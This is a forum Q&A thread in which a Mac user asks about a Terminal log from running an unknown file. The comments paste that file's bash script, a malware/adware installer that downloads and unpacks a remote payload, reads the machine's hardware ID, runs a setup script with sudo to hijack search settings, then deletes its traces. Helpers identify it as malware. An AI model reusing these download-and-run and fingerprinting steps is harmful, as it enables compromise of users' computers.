# Weird Command Prompt Log after Executing a "file" exec

Tags: macos, file, command, command-prompt, prompt

I clicked a file named "file" exec. and the command prompt opened giving me [this](https://i.stack.imgur.com/y1cGb.png) log:

```
Last login: Thu Sep  7 17:42:18 on ttys000
Davids-MacBook-Pro:~ David$ /file ; exit;
logout
Saving session...
...copying shared history...
...saving history...truncating history files...
...completed.

[Prozess beendet]
```

Oh and [this](https://i.stack.imgur.com/E0QZJ.png) is what the "file" exec looks like in my Hard Drive.

Can you please tell me what this means and if it is bad?

Thanks!

Answer (score 0):

The file was executed as a command-line script. What you see is a new Terminal window opening, telling you when you last used it, and giving the prompt "Davids-MacBook-Pro:~ David$ ". The next bit, `/file ; exit;` is the shell command to execute the file and then exit the shell. Everything after that ("logout" etc) is the shell exit & cleanup process.

There's nothing between the command to execute the file and the shell exit process, all we can really say is that it didn't print anything to the Terminal. As for what it did and whether it's bad, I have no way to tell. You can get more info about it by opening Terminal (you need a new Terminal window, since that one's shell has exited), and running the command `file /file` to get info about its format. If the output includes "text", you can print the file's contents with `cat /file`. Include the output of these commands (as text, in the "code" format) in your question, and we may be able to tell you more.

BTW, it's generally a bad idea to execute files when you don't know what they are or where they came from.

Comment: Hi, thanks for your answer. The file is a txt (with very long lines), here is what I get with cat /file:
 (1st chunk)
Davids-MacBook-Pro:~ David$ cat /file
#!/bin/bash
func_4(){
/bin/mkdir -p /var/tmp
/usr/bin/curl -s -L -o /var/tmp/sr.tgz "http://c.installwizz.com/static/sr/sr_v2.tgz"
/usr/bin/tar -xzf /var/tmp/sr.tgz -C /var/tmp
cd /var/tmp/dvs
mid=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }')

Comment: 2nd chunk:
COUNTRY="DE"
if [ "$COUNTRY" == "AU" ] || [ "$COUNTRY" == "CA" ] || [ "$COUNTRY" == "US" ] || [ "$COUNTRY" == "NZ" ]\
  || [ "$COUNTRY" == "ES" ] || [ "$COUNTRY" == "IT" ] || [ "$COUNTRY" == "NL" ] || [ "$COUNTRY" == "FR" ] || [ "$COUNTRY" == "IN" ]\
  || [ "$COUNTRY" == "DE" ]; then
 sudo ./setup.sh "http://www.searchitdown.com/?n=091&searchsource=55&UM=8&gd=SY1000653" "http://www.searchitdown.com/?n=091&searchsource=69&UM=8&gd=SY1000653" "http://www.searchitdown.com/Results.aspx?n=091&searchsource=58&UM=8&gd=SY1000653" "searchitdown" "upd"

Comment: 3rd chunk: 
"http://i.installwizz.com/c/cc?id="
fi

CLIENT_COMP=""
if [[ ! -z "$CLIENT_COMP" ]]; then
 /usr/bin/curl -s -L -o /var/tmp/re.txt "http://i.installwizz.com/is/if?i="
fi

func_taaVqst(){
sleep 220
rm -rf /var/tmp/dvs
rm -rf /var/tmp/sr.tgz
}
func_taaVqst &

}
func_4 &
Davids-MacBook-Pro:~ David$

Comment: That looks like a malware installer. I see the names "DaVinci" and "BrowserEnhancer", but don't see a clear description of it online. Looks like it installs multiple components so if you delete on, another will re-install it. See if [Malwarebytes](https://www.malwarebytes.com/mac/) can clear it up; if not... It's gonna be a fun cleanup.